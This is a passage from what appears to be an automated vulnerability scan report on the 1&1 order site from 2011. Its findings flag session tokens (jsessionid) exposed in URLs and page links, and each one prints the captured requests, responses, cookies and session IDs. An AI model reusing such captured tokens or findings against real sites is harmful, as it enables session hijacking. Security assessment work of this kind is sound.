Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:47:59 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=4ce5cf5491256400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: https://order.1and1.com/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=domaincheck&linkId=hd.tab.yourcart
Content-Length: 0
Connection: close
Content-Type: text/plain


3.106. http://order.1and1.com/xml/order/domaincheck

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/domaincheck

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642646570&__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Home; ucuo=20110320183705-002.TCpfix141a; lastpage=Hosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:7:AAABLtRYEq4lKh04bfPXut2iW59Fdwxl:1300642665134; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:28 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Jc2g4OzwyW1tbVWheZStjXSocJl9pYztSRT8nKygoJyUnJSIiJSQeISUYGjAvLFE/a2BicCgqJVUuWGctICEdHCEdMjUzLTUsKzRsbTMoL19oLiEiHh0iHxw2MTQ1Li8=; Expires=Fri, 07-Apr-2079 20:51:35 GMT; Path=/
ETag: 9d266795a44ed2da88d7a484c599a6b6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 20142


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.107. http://order.1and1.com/xml/order/domaincheck

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/domaincheck

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642646570&__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Home; ucuo=20110320183705-002.TCpfix141a; lastpage=Hosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:7:AAABLtRYEq4lKh04bfPXut2iW59Fdwxl:1300642665134; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:28 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Jc2g4OzwyW1tbVWheZStjXSocJl9pYztSRT8nKygoJyUnJSIiJSQeISUYGjAvLFE/a2BicCgqJVUuWGctICEdHCEdMjUzLTUsKzRsbTMoL19oLiEiHh0iHxw2MTQ1Li8=; Expires=Fri, 07-Apr-2079 20:51:35 GMT; Path=/
ETag: 9d266795a44ed2da88d7a484c599a6b6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 20142


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=domaincheck&amp;linkOrigin=domaincheck&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=domaincheck&amp;page=switch&amp;linkOrigin=domaincheck&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?linkType=&amp;linkOrigin=&amp;linkid=hd.tab.packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<div class="all_link"><a rel="height=600, width=700" class="window-open" href="/xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order">
All domain prices
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=domaincheck&amp;linkOrigin=domaincheck&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.108. http://order.1and1.com/xml/order/eshopupselling

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/eshopupselling

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642661298&__frame=&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642657924&__frame=_top
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:10:AAABLtRYUG7moGPNuumv6jupqX3xwRRp:1300642680942; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=PbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=EYVY9QEE3YGBgWm1jajBoYi8hK2RXUSlAM0QsMC0tLCosKicnKikjJiodHx4dGj8tcGVndS0vKlozXWwyJSYiISYiICMhGyMxMDlxcjgtNGRtMyYnIyInJCEkHyIjHDQ=; Expires=Fri, 07-Apr-2079 20:51:50 GMT; Path=/
ETag: 9764ec14efbf07d8da12215d59db0368
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 19469


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.109. http://order.1and1.com/xml/order/eshopupselling

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/eshopupselling

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642661298&__frame=&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642657924&__frame=_top
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:10:AAABLtRYUG7moGPNuumv6jupqX3xwRRp:1300642680942; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=PbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=EYVY9QEE3YGBgWm1jajBoYi8hK2RXUSlAM0QsMC0tLCosKicnKikjJiodHx4dGj8tcGVndS0vKlozXWwyJSYiISYiICMhGyMxMDlxcjgtNGRtMyYnIyInJCEkHyIjHDQ=; Expires=Fri, 07-Apr-2079 20:51:50 GMT; Path=/
ETag: 9764ec14efbf07d8da12215d59db0368
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 19469


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=eshopupselling&amp;linkOrigin=eshopupselling&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=eshopupselling&amp;page=switch&amp;linkOrigin=eshopupselling&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?linkType=&amp;linkOrigin=&amp;linkid=hd.tab.packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.tab.chooseadomain" rel="button-hd-tab-chooseadomain"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=eshopupselling&amp;linkOrigin=eshopupselling&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=eshopupselling&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
